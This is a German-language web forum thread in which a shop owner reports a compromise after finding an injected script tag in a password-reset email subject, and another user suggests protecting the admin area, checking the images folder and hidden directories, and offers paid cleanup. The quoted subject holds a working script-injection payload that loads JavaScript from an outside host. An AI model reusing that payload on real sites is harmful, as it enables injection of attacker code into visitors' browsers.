Hallo,
habe scheinbar komische Scripte in meinem Shop. Beim "Passwort zurücksetzen"-Mail hatte ich heute folgenden Betreff:
Betreff: </title><script src=http://orangeblue.cl/js/></script><title> - Ihr neues Passwort.
Wo such ich zuerst, um das rauszulöschen?
Auslöser war dieser, dass Bestellmails ohne Inhalte angekommen sind, nur die Mailadresse des Kunden (war ein echter Kunde) war im Mail als Absender, ansonsten leer.
Gruß Marc
Seltsame Scripte -->auch im Mail-Betreff
Hallo Marc.
hast du für den Admin - Bereich einen htaccess Verzeichnisschutz eingerichtet?
Du kannst mit einem normlen Editor z.b. mit netbeans http://netbeans.org/
Scripte auf Inhalte durchsuchen.
Vermutlich wurden auch Scripte in dein Images Verzeichnis veröffentlicht.
~/images/*.*
Achte auch auf Verzeichnisnamen, die mit einem . (Punkt) beginnen.
Wenn du Hilfe für eine Shop- Säuberung benötigst? Wir können dir ab Freitag-Nachmittag ab ca. 15 Uhr helfen
FTP: Zugangsdaten an info@r23.de
Preis: 45 Euro + MwSt.
Wir haben allerdings am Montag eine Veröffentlichung (!) können eigentlich erst am Dienstag...
Beste Grüße
ralf
hast du für den Admin - Bereich einen htaccess Verzeichnisschutz eingerichtet?
Du kannst mit einem normlen Editor z.b. mit netbeans http://netbeans.org/
Scripte auf Inhalte durchsuchen.
Vermutlich wurden auch Scripte in dein Images Verzeichnis veröffentlicht.
~/images/*.*
Achte auch auf Verzeichnisnamen, die mit einem . (Punkt) beginnen.
Wenn du Hilfe für eine Shop- Säuberung benötigst? Wir können dir ab Freitag-Nachmittag ab ca. 15 Uhr helfen
FTP: Zugangsdaten an info@r23.de
Preis: 45 Euro + MwSt.
Wir haben allerdings am Montag eine Veröffentlichung (!) können eigentlich erst am Dienstag...
Beste Grüße
ralf
Hallo ralf,
admin war leider noch ungeschützt, hab ich jetzt per htaccess gemacht.
Im images-ordner waren einige faule Scripte die ich gelöscht habe und auch sonst hab ich Sachen entdecken können.
Jetzt wart ich mal eine Woche ab und komme dann gerne auf dein Angebot zurück, wenn sich wieder Probleme einschleichen!
Danke und schöne Grüße,
Marc
admin war leider noch ungeschützt, hab ich jetzt per htaccess gemacht.
Im images-ordner waren einige faule Scripte die ich gelöscht habe und auch sonst hab ich Sachen entdecken können.
Jetzt wart ich mal eine Woche ab und komme dann gerne auf dein Angebot zurück, wenn sich wieder Probleme einschleichen!
Danke und schöne Grüße,
Marc